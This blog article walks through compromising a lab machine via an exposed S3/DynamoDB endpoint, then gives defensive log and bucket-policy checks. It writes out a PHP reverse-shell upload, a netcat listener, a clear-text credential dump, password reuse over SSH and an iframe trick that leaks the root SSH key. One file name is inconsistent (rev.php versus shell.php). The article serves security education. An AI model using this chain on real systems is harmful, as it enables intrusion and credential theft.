
Amazon AWS anti-data-leak guidance 2021

Protection measures and an S3 bucket hacking demonstration on a vulnerable machine

Updated: November 17, 2021 By Dmytro Cherkashyn


The AWS S3 cloud service now has 100 trillion objects in its storage, and Amazon claims that the objects stored there have 99.99999999% durability. Huge companies like Netflix, Twitch, and BBC use Amazon S3 Services to store their data on the cloud.

In this article, we will:

  • analyse vulnerabilities regarding the S3 buckets
  • show in detail how to hack a machine running AWS services
  • list some protection measures recommended by Amazon and us to keep your data safe on the cloud.

Disclaimer: The attack replicated in this article was performed on a machine in a safe environment, made especially for this. Please do not attack anyone without their written consent.

Amazon S3 Bucket Vulnerability

I will show you how I have replicated an attack by using the file upload feature of Amazon S3.

I first installed the AWS CLI (Command Line Interface) on my Kali Linux machine with the command:

sudo apt install awscli

We install the AWS CLI using the command sudo apt install awscli

I then attempted to connect to a custom endpoint and list the files in the server:

aws --endpoint-url http://s3.bucket.htb s3 ls

We connect to an endpoint, but we first have to configure credentials

However, credentials need to be configured to connect. They can be set with the following command:

aws configure

If you leave every field blank when prompted, the connection fails. Entering arbitrary, invalid keys (any value in each field), however, is enough: the endpoint accepts them.

We issue the previous command, and it works; we are connected to the endpoint.

We can now connect to the endpoint

Now we will use the file upload feature of Amazon AWS by uploading a reverse shell that connects back to us.

A reverse shell is a command or a collection of commands that establish a connection from a remote machine to our machine. We are making the target machine connect to us by injecting a file that executes these commands.

On Kali Linux, such reverse shells are already present in the directory /usr/share/laudanum/php. On a different Linux flavor, you can download a reverse shell from PentestMonkey.

However, before using this file you must set your own IP address and port in it. You can find your IP with ifconfig; I used port 443. The parameters you have to change are marked with comments (or use CTRL+F to find them quickly).

We change the reverse shell with our IP and port

We then upload the file on the server by using the cp (copy) command.

aws --endpoint-url http://s3.bucket.htb s3 cp reverse_shell.php s3://adserver/rev.php

We upload the reverse shell under the name rev.php

You should get a prompt back with the upload location.

We set up the Netcat listener. The machine will connect to us on port 443, so we must use Netcat to receive the connection.

sudo nc -nlvp 443

We turn on a netcat listener on port 443

We now browse the website to execute our shell. To find our injected file, we type the website’s URL and then a ‘/’ and the file name. We uploaded it under the name shell.php.

We visit the website at /shell.php to execute our injected commands

After we browse it, we check in the terminal and see that we have a shell.

Gained low privileged shell as www-data

We can now type commands on the machine hosting the server.

We are running as the low-privilege user www-data. This does not mean the vulnerability has a small impact: there are many ways to escalate privileges from here.

Before continuing with this shell, I will show you some other commands you can run against the AWS server that expose a significant vulnerability.

The same endpoint also serves DynamoDB. We can use it to learn more about the database: the following command describes a table by name, confirming that a table called users exists.

aws --endpoint-url=http://s3.bucket.htb dynamodb describe-table --table-name users

We find the name of the table ‘users’

We see that the database contains the table “users”. Enumerating further, we find the users and the clear-text passwords.

aws --endpoint-url=http://s3.bucket.htb dynamodb scan --table-name users

We read the credentials from the table ‘users’

Going back to our initial shell, we need to find the users of the machine. They are not necessarily the same as the users in the database, but password reuse is common, so the credentials we found may still be valid.

ls -la /home

We list the directories from home to find all the users

We see the user roy. To have a more stable shell and show you how to use SSH on the machine, we will connect with SSH to try all the passwords in the database. The last one works, and we are connected as roy on the machine!

We SSH as roy and test the obtained credentials

Now, to gain full control of the system, we use the AWS server one more time.

We create the table alerts:

aws dynamodb create-table \
  --table-name alerts \
  --attribute-definitions \
    AttributeName=title,AttributeType=S \
    AttributeName=data,AttributeType=S \
  --key-schema \
    AttributeName=title,KeyType=HASH \
    AttributeName=data,KeyType=RANGE \
  --provisioned-throughput \
    ReadCapacityUnits=10,WriteCapacityUnits=5 \
  --endpoint-url http://s3.bucket.htb

And add a record:

aws dynamodb put-item \
  --table-name alerts \
  --item '{ "title": {"S": "Ransomware"}, "data": {"S": "<html><head></head><body><iframe src=\"/root/.ssh/id_rsa\"></iframe></body></html>"} }' \
  --return-consumed-capacity TOTAL \
  --endpoint-url http://s3.bucket.htb

Triggering the alert rendering of the local web application, which listens on port 8000, makes it embed the root’s SSH key from /root/.ssh into the generated PDF:

curl -X POST -d "action=get_alerts" http://127.0.0.1:8000

We then use curl to download the generated PDF that contains the root’s key:

curl http://127.0.0.1:8000/files/result.pdf -o ./result.pdf

We open the result.pdf and find the RSA key.

We save the key to a file called id_rsa and set the permissions SSH requires before connecting (the target address is a placeholder):

chmod 400 id_rsa
ssh root@<target-ip> -i id_rsa

We change the permissions on the root’s key and successfully SSH into it, gaining full access to the machine

And we have gained full access to the machine, using Amazon AWS S3 bucket vulnerabilities.
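From the defender’s side, the sequence above (an anonymous upload of a .php object followed by a bucket listing) leaves a trace in S3 server access logs. The following Python is an added example, not part of the original article: it parses constructed log lines laid out like AWS’s space-separated access-log format and flags the events a monitoring rule should raise.

```python
import re

# Constructed S3 server access log lines laid out like AWS's format
# (owner, bucket, [time], remote IP, requester, request id, operation,
# key, "request-URI", status, ...). They are invented for this article;
# an anonymous requester is logged as "-".
SAMPLE_LOG = """\
OWNERID adserver [17/Nov/2021:10:00:01 +0000] 203.0.113.5 - 3E57427F3EXAMPLE REST.PUT.OBJECT rev.php "PUT /adserver/rev.php HTTP/1.1" 200
OWNERID adserver [17/Nov/2021:10:00:02 +0000] 203.0.113.5 - 3E57427F3EXAMPLE REST.GET.BUCKET - "GET /adserver HTTP/1.1" 200
OWNERID adserver [17/Nov/2021:09:59:00 +0000] 198.51.100.7 arn:aws:iam::111122223333:user/deploy A1B2C3EXAMPLE REST.PUT.OBJECT images/banner.png "PUT /adserver/images/banner.png HTTP/1.1" 200
"""

LINE_RE = re.compile(
    r'^(?P<owner>\S+) (?P<bucket>\S+) \[(?P<time>[^\]]+)\] (?P<ip>\S+) '
    r'(?P<requester>\S+) (?P<reqid>\S+) (?P<op>\S+) (?P<key>\S+) '
    r'"(?P<uri>[^"]*)" (?P<status>\d+)'
)
# Object suffixes that should never land in a bucket served by a web server.
SERVER_SIDE_EXT = (".php", ".jsp", ".asp", ".aspx", ".cgi")


def parse_line(line):
    """Return the named fields of one access-log line, or None if it does not match."""
    m = LINE_RE.match(line)
    return m.groupdict() if m else None


def suspicious_events(log_text):
    """Flag anonymous bucket listings/writes and uploads of server-side script files."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if not rec:
            continue
        reasons = []
        anonymous = rec["requester"] == "-"
        if anonymous and rec["op"].startswith(("REST.PUT", "REST.DELETE", "REST.POST")):
            reasons.append("anonymous write")
        if anonymous and rec["op"] == "REST.GET.BUCKET":
            reasons.append("anonymous listing")
        if rec["op"] == "REST.PUT.OBJECT" and rec["key"].lower().endswith(SERVER_SIDE_EXT):
            reasons.append("server-side script uploaded")
        if reasons:
            findings.append({"ip": rec["ip"], "op": rec["op"], "key": rec["key"], "reasons": reasons})
    return findings
```

In a real deployment, the same checks would run over the access logs delivered to your logging bucket, and any hit on "anonymous write" means Block Public Access or the bucket policy is misconfigured.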

What is Amazon S3?

Amazon Simple Storage Service, or Amazon S3, is a service offered by Amazon Web Services (AWS) built to offer object storage on the Cloud. Amazon promises:

  • scalability
  • data availability
  • security
  • performance

A Bucket is a resource available on an AWS S3 server. It is a container, like a folder, that stores objects (which are defined by files and their metadata).

According to a trusted source, AWS’s top users include huge companies like Netflix, Twitch, LinkedIn, Facebook, BBC, Adobe, Twitter, etc.

Top 10 AWS users

Protection measures

To protect your AWS S3 bucket and disallow intruders’ access to your storage space, you can use the following features provided by Amazon:

  • Block public access
  • Use Bucket ACLs (Access Control Lists) to restrict read, write, access permissions from ‘Everyone’
  • Scan your Amazon S3 buckets with the ListBuckets API
  • Implement bucket policies that do not allow everyone to access and perform actions on the bucket (note: a wildcard “*” principal means everyone, including anonymous users)
  • Encrypt your data. Amazon supports HTTPS, which encrypts data in transit.
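To make the wildcard point concrete, here is an added Python example (not from the article or from AWS): a constructed bucket policy with the weak "Principal": "*" statement beside a hardened one that names a single deployment role (placeholder account id), and a small checker that reports every Allow statement open to everyone and whether it grants writes.

```python
import json

# Constructed example of a dangerous bucket policy: the wildcard principal
# grants every anonymous caller read AND write on the bucket from the
# walkthrough. Written for this article, not taken from a real account.
WEAK_POLICY = json.loads("""{
  "Version": "2012-10-17",
  "Statement": [{
    "Sid": "PublicReadWrite",
    "Effect": "Allow",
    "Principal": "*",
    "Action": ["s3:GetObject", "s3:PutObject"],
    "Resource": "arn:aws:s3:::adserver/*"
  }]
}""")

# Hardened form: only one named role may write, and only over TLS.
# The account id and role name are placeholders.
HARDENED_POLICY = json.loads("""{
  "Version": "2012-10-17",
  "Statement": [{
    "Sid": "DeployRoleWrite",
    "Effect": "Allow",
    "Principal": {"AWS": "arn:aws:iam::111122223333:role/adserver-deploy"},
    "Action": "s3:PutObject",
    "Resource": "arn:aws:s3:::adserver/*",
    "Condition": {"Bool": {"aws:SecureTransport": "true"}}
  }]
}""")

WRITE_PREFIXES = ("s3:Put", "s3:Delete", "s3:*")


def is_wildcard_principal(principal):
    """True for "*" or {"AWS": "*"}, including "*" inside a list of principals."""
    if principal == "*":
        return True
    if isinstance(principal, dict):
        aws = principal.get("AWS", [])
        return "*" in (aws if isinstance(aws, list) else [aws])
    return False


def public_statements(policy):
    """Return (Sid, actions, grants_write) for each Allow statement open to everyone."""
    findings = []
    for st in policy.get("Statement", []):
        if st.get("Effect") != "Allow" or not is_wildcard_principal(st.get("Principal")):
            continue
        actions = st.get("Action", [])
        actions = actions if isinstance(actions, list) else [actions]
        grants_write = any(a == "*" or a.startswith(WRITE_PREFIXES) for a in actions)
        findings.append((st.get("Sid", "<no Sid>"), actions, grants_write))
    return findings
```

Run public_statements over a policy exported with the AWS CLI (aws s3api get-bucket-policy) to find the statements that the “Block public access” setting exists to neutralise.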

Infographic

I have prepared an infographic where you can see statistics about the Amazon S3 cloud storage platform. Please read the protection measures carefully and apply them to keep your private data safe!

Infographic about Amazon AWS S3 cloud storage


Conclusion

Considering the demonstration shown in this article, you should take great care of your cloud storage and take all the security measures that Amazon & I recommend.

This matters because the demonstration showed how the machine hosting the AWS service can be compromised, and the damage can extend to your or your company’s storage.

If you use the Amazon AWS S3 services, let me know whether you have heard of any other vulnerabilities and what protection measures you take to keep your private data safe.

Stay tuned and watch around!

Editor-in-Chief
Dmytro Cherkashyn
Being a passionate security expert from Ukraine, Dmytro has passed through various security domains for the last 12 years, starting with the physical security of nuclear facilities and coming to operational technology cybersecurity for critical infrastructure in Germany.
